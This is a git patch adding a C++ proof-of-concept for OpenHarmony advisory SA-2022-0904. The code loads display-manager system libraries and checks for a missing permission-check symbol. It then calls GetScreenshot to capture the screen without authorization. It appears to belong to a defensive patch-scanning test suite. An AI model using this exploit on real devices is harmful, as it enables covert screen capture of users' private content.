From 9fe9db0713590d8f45de6ab4e734987d03b59c44 Mon Sep 17 00:00:00 2001 From: lakemoon Date: Mon, 6 Mar 2023 11:13:09 +0800 Subject: [PATCH] =?UTF-8?q?=E6=8F=90=E4=BA=A4OpenHarmony-SA-2022-0904?= =?UTF-8?q?=E5=8A=A8=E6=80=81=E6=B5=8B=E8=AF=95=E7=94=A8=E4=BE=8B?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: lakemoon --- .../2022-09/OpenHarmony-SA-2022-0904/poc.cpp | 100 ++++++++++++++++++ 1 file changed, 100 insertions(+) create mode 100644 demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0904/poc.cpp diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0904/poc.cpp b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0904/poc.cpp new file mode 100644 index 000000000..ef4fd1b48 --- /dev/null +++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0904/poc.cpp @@ -0,0 +1,100 @@ +/* + * Copyright (c) 2023 Huawei Device Co., Ltd. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +#include +#include +#include +#include +namespace Media { + class PixelMap; +} + +int main() { + void *handle,*handle2; + // 打开共享库libdms.z.so + handle2 = dlopen("/system/lib/libdms.z.so", RTLD_LAZY); + if (!handle2) { + fprintf(stderr, "Error: %s\n", dlerror()); + return 1; + } + + // 获取函数DisplayManagerStub::IsStartByHdcd地址 + void* IsStartByHdcd= dlsym(handle2, "_ZN4OHOS5Rosen18DisplayManagerStub13IsStartByHdcdEv"); + if (!IsStartByHdcd) { + printf("OpenHarmony-SA-2022-0904: vulnerable!\n"); + } else { + printf("OpenHarmony-SA-2022-0904: not vulnerable!\n"); + return 1; + } + + // 打开共享库libdm.z.so + handle = dlopen("/system/lib/libdm.z.so", RTLD_LAZY); + if (!handle) { + fprintf(stderr, "Error: %s\n", dlerror()); + return 1; + } + + // 获取函数DisplayManager::GetInstance地址 + typedef void* (*CreateObjFunc)(); + CreateObjFunc create_obj = reinterpret_cast(dlsym(handle, "_ZN4OHOS5Rosen14DisplayManager11GetInstanceEv")); + if (create_obj == NULL) { + fprintf(stderr, "Error: %s\n", dlerror()); + dlclose(handle); + return 1; + } + // 创建类实例 + void* obj = create_obj(); + + // 获取函数DisplayManager::GetDefaultDisplayId地址 + typedef uint64_t (*DisplayId)(void*); + DisplayId GetDefaultDisplayId = NULL; + GetDefaultDisplayId = reinterpret_cast( dlsym(handle, "_ZN4OHOS5Rosen14DisplayManager19GetDefaultDisplayIdEv")); + if (GetDefaultDisplayId == NULL) { + fprintf(stderr, "Error: %s\n", dlerror()); + dlclose(handle); + return 1; + } + + // 调用函数DisplayManager::GetDefaultDisplayId + uint64_t displayId = GetDefaultDisplayId(obj); + if (displayId == -1ULL) { + printf("GetDefaultDisplayId failed!\n"); + } else{ + printf("DisplayId: %llu\n", displayId); + } + + // 获取函数DisplayManager::GetScreenshot地址 + typedef std::shared_ptr (*GetDisplaySnapshot)(void*,uint64_t); + GetDisplaySnapshot GetPixelMap = nullptr; + GetPixelMap = reinterpret_cast(dlsym(handle, "_ZN4OHOS5Rosen14DisplayManager13GetScreenshotEy")); + if (GetPixelMap == NULL) { + fprintf(stderr, "Error: %s\n", dlerror()); + dlclose(handle); + return 1; + } + // 调用函数DisplayManager::GetScreenshot + void* PixelMap = nullptr; + PixelMap = GetPixelMap(obj,displayId).get(); + if (PixelMap == nullptr) { + printf("GetDefaultDisplayId failed!\n"); + } else{ + printf("PixelMap: %p\n", PixelMap); + } + + // 关闭共享库 + + + return 0; +} \ No newline at end of file -- GitLab